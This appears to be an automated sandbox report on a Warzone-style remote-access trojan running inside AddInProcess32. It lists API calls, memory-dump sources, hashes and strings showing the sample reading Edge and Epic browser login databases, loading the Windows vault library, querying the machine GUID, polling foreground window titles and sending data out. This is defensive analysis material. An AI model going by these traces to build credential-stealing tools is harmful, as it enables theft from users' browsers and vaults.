                                                                                        • Part of subcall function 6CD1F291: NSSUTIL_ArgFetchValue.NSS3(-0000000A,?,?), ref: 6CD1F2DD
                                                                                        • Part of subcall function 6CD1F291: NSSUTIL_ArgStrip.NSS3(00000000,?,?,?,?), ref: 6CD1F324
                                                                                        • Part of subcall function 6CD1F291: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,?,?,00000000,?,?,?,?,6CD1D524,?,?,?,?,?), ref: 6CD1F34C
                                                                                        • Part of subcall function 6CD1F291: PORT_Free_Util.NSS3(00000000,?), ref: 6CD1F364
                                                                                        • Part of subcall function 6CD1F291: PORT_Strdup_Util.NSS3(secmod.db,?), ref: 6CD1F36F
                                                                                        • Part of subcall function 6CD1F291: _NSSUTIL_EvaluateConfigDir.NSS3(?,?,?,?), ref: 6CD1F386
                                                                                        • Part of subcall function 6CD1F291: NSSUTIL_ArgHasFlag.NSS3(flags,noModDB,?,?,?,?,?), ref: 6CD1F39B
                                                                                        • Part of subcall function 6CD1F291: PORT_Free_Util.NSS3(?,?,?,?,?,?,?,?), ref: 6CD1F3B7
                                                                                      • PORT_SetError_Util.NSS3(FFFFE0B1), ref: 6CD1D5B9
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CD1D5C4
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD1D5D4
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD1D5E3
                                                                                        • Part of subcall function 6CD1E359: PORT_Free_Util.NSS3(00000000,00000000,00000000,?,6CD1E2A0,00000000,00000000,00000000), ref: 6CD1E37C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_$FlagStrip$ConfigError_EvaluateFetchL_strncasecmpNameR_smprintf_freeSecmodStrdup_Value
                                                                                      • String ID:
                                                                                      • API String ID: 2762289509-0
                                                                                      • Opcode ID: 365f6f1a4c40b9e25734cedfafe570a0034730e1edb6149bfae248b239e6f050
                                                                                      • Instruction ID: 2ffcc88dc08806ef89f92a9c6af7efc9221f0e4772ecc429fe59a9cbb4341405
                                                                                      • Opcode Fuzzy Hash: 365f6f1a4c40b9e25734cedfafe570a0034730e1edb6149bfae248b239e6f050
                                                                                      • Instruction Fuzzy Hash: 42313E32809118FBDF039F95ED049EEBF75EB46618F2401AAE81562E30D7328B50DBA0
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNEL32(6CD88358,00000000,6CCB8B64,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCB8BE5
                                                                                      • sqlite3_vfs_register.NSS3(6CD86000,00000001,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCB8BF2
                                                                                        • Part of subcall function 6CC69DF1: sqlite3_initialize.NSS3(?,6CCB8BF7,6CD86000,00000001,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC69DF4
                                                                                        • Part of subcall function 6CC69DF1: sqlite3_mutex_enter.NSS3(00000000,6CCB8BF7,6CD86000,00000001,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC69E17
                                                                                        • Part of subcall function 6CC69DF1: sqlite3_mutex_leave.NSS3(00000000,6CCB8BF7,6CD86000,00000001,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC69E4C
                                                                                      • sqlite3_vfs_register.NSS3(6CD86058,00000000,6CD86000,00000001,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCB8BFE
                                                                                      • sqlite3_vfs_register.NSS3(6CD860B0,00000000,6CD86058,00000000,6CD86000,00000001,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCB8C0A
                                                                                      • sqlite3_vfs_register.NSS3(6CD86108,00000000,6CD860B0,00000000,6CD86058,00000000,6CD86000,00000001,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCB8C16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                      • String ID:
                                                                                      • API String ID: 3532963230-0
                                                                                      • Opcode ID: 61f80e2514dc45cde01703142da3b83746e14920be803386ccee80faf447777d
                                                                                      • Instruction ID: 75e68647dc47b32df6565bf3ab7eeb316dff66938d250046d3e0bc053c86751e
                                                                                      • Opcode Fuzzy Hash: 61f80e2514dc45cde01703142da3b83746e14920be803386ccee80faf447777d
                                                                                      • Instruction Fuzzy Hash: 0AE012F136524137FD6023FAADC7F9E105187C4B66F704871B216E8FD5FE51500A111A
                                                                                      APIs
                                                                                        • Part of subcall function 0040ACBE: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040A98E,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000,00000000,00000007,\Epic Privacy Browser\User Data\Default\Login Data,\Epic Privacy Browser\User Data\Local State), ref: 0040ACC6
                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000,00000000,00000007,\Epic Privacy Browser\User Data\Default\Login Data,\Epic Privacy Browser\User Data\Local State,00000000,00000000), ref: 0040AC6B
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 0040335A: lstrcmpW.KERNEL32(?,?,?,0040AB4A,00000000,Internet Explorer,?,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000), ref: 00403364
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                        • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000,00000000,?,?,0041348B,00000000,00000000,00000000,.bss,00000000), ref: 0040356E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeLibrarylstrlen$DispatcherExceptionLoadUserVirtuallstrcmplstrcpy
                                                                                      • String ID: 4$8$Internet Explorer
                                                                                      • API String ID: 2576498667-747916358
                                                                                      • Opcode ID: 21b2e76319ba796e4536cabb014015aea64c9db2b3fd467715e64033d8a570d8
                                                                                      • Instruction ID: a99aea2a735c9718559e27865e5f0cd770b9fcd1e9f38770a9e7eda6b777dcf3
                                                                                      • Opcode Fuzzy Hash: 21b2e76319ba796e4536cabb014015aea64c9db2b3fd467715e64033d8a570d8
                                                                                      • Instruction Fuzzy Hash: 98A13D70D00219ABCF14EFA6CC869EEBB79FF04708F14442AF401B7291DB78AA55CB58
                                                                                      APIs
                                                                                      • send.WS2_32(000000FF,?,?,00000000), ref: 00405758
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: send
                                                                                      • String ID: bP@$bP@$warzoneTURBO
                                                                                      • API String ID: 2809346765-4158852807
                                                                                      • Opcode ID: c4755fd9a8420c1a19501a579e6db687e13aef39c314565fe7ab12d233b7816a
                                                                                      • Instruction ID: f3416621e5f2c5c02f3395680495e6a6f54d57ba278d3546227d2c899631d6b7
                                                                                      • Opcode Fuzzy Hash: c4755fd9a8420c1a19501a579e6db687e13aef39c314565fe7ab12d233b7816a
                                                                                      • Instruction Fuzzy Hash: 4A01C431900009BBCB04BFA6DC42CEEBB68DF14325B10423EF122761D1DB396B058A68
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(?), ref: 6CC62115
                                                                                      • sqlite3_prepare_v2.NSS3(?,?,000000FF,?,?), ref: 6CC62150
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_prepare_v2
                                                                                      • String ID:
                                                                                      • API String ID: 2098679814-0
                                                                                      • Opcode ID: 9e74950abb015728485db32b96824fbd48a737a86f80f6cdfd45f1f033a75965
                                                                                      • Instruction ID: 4b3bb05055e8ed5d2ede2da959712b8377d52d1bf6e078f00b0df321e305f787
                                                                                      • Opcode Fuzzy Hash: 9e74950abb015728485db32b96824fbd48a737a86f80f6cdfd45f1f033a75965
                                                                                      • Instruction Fuzzy Hash: 40210572A05205ABDB019FA69DC5FEF37ACEF41229F20413AE51496E80FB3099058694
                                                                                      APIs
                                                                                      • GetCommandLineA.KERNEL32 ref: 00405E2F
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00405E7E
                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00405E9A
                                                                                      • ExitProcess.KERNEL32 ref: 00405EAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                      • String ID:
                                                                                      • API String ID: 2164999147-0
                                                                                      • Opcode ID: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                                                                      • Instruction ID: 79012c7e925f986a536a85d8df8cd7193993c2d42f70a77d9956ba037c84b5bc
                                                                                      • Opcode Fuzzy Hash: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                                                                      • Instruction Fuzzy Hash: DE010434108A444ED7206B74D8863EB3FA6DB1A348B68107EE1C5A7382C63E0E478EDD
                                                                                      APIs
                                                                                        • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                                        • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                      • String ID:
                                                                                      • API String ID: 2517252058-0
                                                                                      • Opcode ID: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                                                                      • Instruction ID: aa115e6f790b4d38b1fbeae35b29bc5e12f96e584a277f2799dc653a56db372b
                                                                                      • Opcode Fuzzy Hash: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                                                                      • Instruction Fuzzy Hash: E1F0AFB2605210BFE3215B35AC09FFB76ACDB54725F204135FA41E62C0EBB45E0086A8
                                                                                      APIs
                                                                                      • GetLastInputInfo.USER32(?), ref: 004048CC
                                                                                      • GetTickCount.KERNEL32 ref: 004048D2
                                                                                      • GetForegroundWindow.USER32 ref: 004048E6
                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 004048F9
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Windowlstrlen$CountDispatcherExceptionForegroundFreeInfoInputLastTextTickUserVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3825627427-0
                                                                                      • Opcode ID: 9606b2c99b18a595e3084129dae827e5d1b1a10261750d86010a23d2965b47b6
                                                                                      • Instruction ID: 7d24786f3acb5e761febb0f7532cdf611125a99f062c3633d978c4158144353a
                                                                                      • Opcode Fuzzy Hash: 9606b2c99b18a595e3084129dae827e5d1b1a10261750d86010a23d2965b47b6
                                                                                      • Instruction Fuzzy Hash: D2110C72D00109ABCB04EFA1DD59ADDBBBDEF58305F0081A9B406B7191EF78AB44CB58
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,759801C0,00000000,759801C0,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411167
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                      • String ID:
                                                                                      • API String ID: 215268677-0
                                                                                      • Opcode ID: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                                                                      • Instruction ID: 0771c0d2f46ea20c01bd2ae64a6620b8b7ded6cbafb58bfe859f8e00c08c725d
                                                                                      • Opcode Fuzzy Hash: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                                                                      • Instruction Fuzzy Hash: 87F0F971E00218FBDB119BA0DD09BDEBBB8EF08751F118065EA01E61A0D7709F84DAA4
                                                                                      APIs
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                      • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                        • Part of subcall function 00412569: RegQueryValueExW.KERNEL32(?,759801C0,00000000,759801C0,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                                        • Part of subcall function 00412569: RegQueryValueExW.KERNEL32(?,759801C0,00000000,759801C0,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                                        • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
                                                                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                      • API String ID: 1654648907-1211650757
                                                                                      • Opcode ID: 8c380f31692e5f336bad90f2d0857887b79979ce9212a004982791671e2886a4
                                                                                      • Instruction ID: abda254be5c657bc903fa0ced37de60f06049733804472e9a7e1bd392f4ec8b1
                                                                                      • Opcode Fuzzy Hash: 8c380f31692e5f336bad90f2d0857887b79979ce9212a004982791671e2886a4
                                                                                      • Instruction Fuzzy Hash: 40115C30A0011AAACB04EF95C9628EEBB79AF54745B50016FF401B31D1DBB85F49DBA9
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNEL32(?,759801C0,00000000,759801C0,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                                        • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                                        • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                                      • RegQueryValueExW.KERNEL32(?,759801C0,00000000,759801C0,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                                        • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                                        • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$ProcessQueryValue$AllocateFree
                                                                                      • String ID: ?VA
                                                                                      • API String ID: 3459632794-1028452459
                                                                                      • Opcode ID: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                                                                      • Instruction ID: ef5b91e0520f3c1ad74f83bd351b8b7f17400620d7ac54be9350e6622f7c98ba
                                                                                      • Opcode Fuzzy Hash: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                                                                      • Instruction Fuzzy Hash: E7019E72900118BFEB15DFA1DD85DEF7BBDEF08354B10007AF901E2250EA749F959AA4
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(759801C0,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                                                                        • Part of subcall function 00410C50: RegOpenKeyExW.ADVAPI32(759801C0,00000000,00000000,00020019,00000000,759801C0,?,0041262E,?,?,?VA,?,00412B64,80000001,?,000F003F), ref: 00410C66
                                                                                      • RegCreateKeyExW.ADVAPI32(759801C0,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                                                                        • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Open$CloseCreate
                                                                                      • String ID: ?VA
                                                                                      • API String ID: 1752019758-1028452459
                                                                                      • Opcode ID: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                                                                      • Instruction ID: 4932445430126be2ff0c3f65702f86cceb6eb04fd32848aa65fa8fc0dd82d40c
                                                                                      • Opcode Fuzzy Hash: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                                                                      • Instruction Fuzzy Hash: 5A01197120020EBFAB119F62DE84DFB7B6EEF44398B10402AF905D1250E7B5CDA19AB5
                                                                                      APIs
                                                                                      • realloc.MOZGLUE(?,?), ref: 6CC65A89
                                                                                      • malloc_usable_size.MOZGLUE(?,?), ref: 6CC65A9D
                                                                                      Strings
                                                                                      • failed memory resize %u to %u bytes, xrefs: 6CC65AA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc_usable_sizerealloc
                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                      • API String ID: 1906237842-2134078882
                                                                                      • Opcode ID: 19d40609620acc47fcee9a3a1c3ba3a0f20a9e9c32d04a2c942010108e3fd699
                                                                                      • Instruction ID: ff0ea1db28378075d098d866dfcbe09f0bee9024ca992cfd16191d112cc960ca
                                                                                      • Opcode Fuzzy Hash: 19d40609620acc47fcee9a3a1c3ba3a0f20a9e9c32d04a2c942010108e3fd699
                                                                                      • Instruction Fuzzy Hash: 6FE0CD735041147FEF111B85EC419D97F19DB007F8F404055FE1C59A60E7325D2057D0
                                                                                      APIs
                                                                                      • memcmp.VCRUNTIME140(?,@ ,00000003,?,00000000,?,?,?,?,?,?,6CC91275,?,6CC9FDDC,?,00000000), ref: 6CC85284
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmp
                                                                                      • String ID: @ $SQLite format 3
                                                                                      • API String ID: 1475443563-3708268960
                                                                                      • Opcode ID: b5c950f7d3ca7749e5d64342d9dc67ab31c1313f669e64fbab49952231b4f23c
                                                                                      • Instruction ID: 4b2ab31b5b9ee1b0e57561d8d743eb50300378cb70f79bec5e3613893f5352bf
                                                                                      • Opcode Fuzzy Hash: b5c950f7d3ca7749e5d64342d9dc67ab31c1313f669e64fbab49952231b4f23c
                                                                                      • Instruction Fuzzy Hash: 0161C271E0621AAFEB04CF69C49069ABBB5FF04318F144169E905DBA41F7B0EA94CBD0
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(000001F4,00000000,759801C0,00000000), ref: 00405B64
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,759801C0,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                                        • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                        • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000,00000000,?,?,0041348B,00000000,00000000,00000000,.bss,00000000), ref: 0040356E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpylstrlen$FreeSleepVirtual
                                                                                      • String ID: .VA$.bss
                                                                                      • API String ID: 277671435-4282314365
                                                                                      • Opcode ID: 1bc397098356486b94bbb130942b6f149ed51b0b2552b16daee239d59f52bc9f
                                                                                      • Instruction ID: d77f0bc86c0f0e09d154f713c611f4ee480ed774d1177d5a26b30425dba20ef3
                                                                                      • Opcode Fuzzy Hash: 1bc397098356486b94bbb130942b6f149ed51b0b2552b16daee239d59f52bc9f
                                                                                      • Instruction Fuzzy Hash: 8C516671900519AFCB15EFA1C8D18EEBBB9EF44308B1041BEE406AB296DF34AB45CF54
                                                                                      APIs
                                                                                      • SECMOD_DestroyModule.NSS3(?,?,?,?,?,?,6CD04A77,00000000,?,?), ref: 6CD04CDE
                                                                                      • PORT_SetError_Util.NSS3(00000000,00000000,?,?,?,?,?,6CD04A77,00000000,?,?), ref: 6CD04D6F
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000001,00000000,0000001C,?,?,?,?,?,?,6CD04A77,00000000,?,?), ref: 6CD04D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
